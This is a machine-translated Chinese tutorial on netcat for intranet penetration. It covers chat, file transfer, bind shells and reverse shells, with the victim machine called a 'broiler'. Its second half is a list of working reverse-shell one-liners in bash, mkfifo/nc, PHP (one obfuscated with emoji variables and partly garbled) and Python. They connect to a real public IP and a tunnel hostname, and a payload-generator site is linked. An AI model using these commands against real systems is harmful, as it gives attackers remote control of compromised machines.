Intranet penetration technology (nc)

Netcat Often called nc, Have “ Swiss Army knife ” The reputation of the .

nc Small and strong , Can read and write TCP or UDP network connections , It is designed as a reliable back-end tool ,
Can be driven directly by other programs or scripts . meanwhile , It is also a network debugging and development tool with rich functions
, Because it can establish almost any type of connection you may use , And some very interesting built-in functions ,
It's based on socket Agreement work . In the field of penetration testing , We usually use it to bounce shell

Chat

Listen to the port on one side , Send a message to this port , Form a simple version of the server — Client model .

• Server side ：

nc   -lvp    8888       

monitor 8888 port -l monitor -v Show details -p Designated port

• client ：

nc  -nv  192.168.100.140  8888    

Connected to the server 8888 port -n Specify the number of IP Address -v Show details

File transfer

• Server side ：

nc  -lvp  8888 < test.txt

monitor 8888 port -l monitor -v Show details -p Designated port

• client ：

 nc -nvz 192.168.100.140 8888 > 1.txt  

Connected to the server 8888 port -n Specify the number of IP Address -v Show details -z Turn the I / O off

Forward connection

chicken

nc -lvvp 8888 -te cmd.exe

nc -lvvp 8888 -te /bin/bash

Broiler monitor 8888 port -l monitor -vv Show more details -p Designated port -t Use interaction -e Program redirection , Once connected , Is executed

host

nc  -nvv  192.168.10.14  8888

The host is connected to the broiler 8888 port -n Specify the number of IP Address -vv Show more details

Reverse connection

When the broiler is in the middle of the intranet , The host must have a public network ip, Then let the broiler take the initiative to connect to the host , Even if the broiler is a public network ip, But generally there is a firewall to intercept , So reverse connection is a good choice

chicken

 nc  -te /bin/bah 19.16.10.14  8888

host

nc  -lvp  8888

Port mapping ( Peanut shell ,natapp)

Here we only use Peanut shell As an example …

Build a tcp Mapping

Experimental environment

chicken : 192.168.100.133

Local host : n4221p5430.wicp.vip(103.46.128.49):25741 -> 127.0.0.1:5555

Execute in the local host :

 nc  -lvp  5555

Execution in broiler :

Various payload Build site

https://s.xiaoxiaoran.top/

 echo 'bash -i >& /dev/tcp/103.46.128.49/25741 0>&1' | bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 103.46.128.49 25741 >/tmp/f

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc  n4221p5430.wicp.vip 25741 >/tmp/f

php -r '$="1";$="2";$="3";$="4";$="5";$="6";$="7";$="8";$="9";$="0";$=" ";$="<";$=">";$="-";$="&";$🤩="i";$=".";$🤨="/";$🥰="a";$="b";$="i";$="h";$="c";$="d";$="e";$="f";$="k";$="n";$="o";$="p";$="s";$="x";$ = $. $. $. $. $. $. $. $. $;$ = "103.46.128.49";$ = 25741;$ = "sh". $. $. $🤩. $. $. $. $. $. $. $. $. $. $. $. $. $;$ = $($,$);$ = $. $. $. $;$($);'

php -r '$sock=fsockopen("103.46.128.49",25741);exec("sh <&3 >&3 2>&3");'

php -r '$sock=fsockopen("103.46.128.49",25741);passthru("sh <&3 >&3 2>&3");'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("n4221p5430.wicp.vip",25741));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'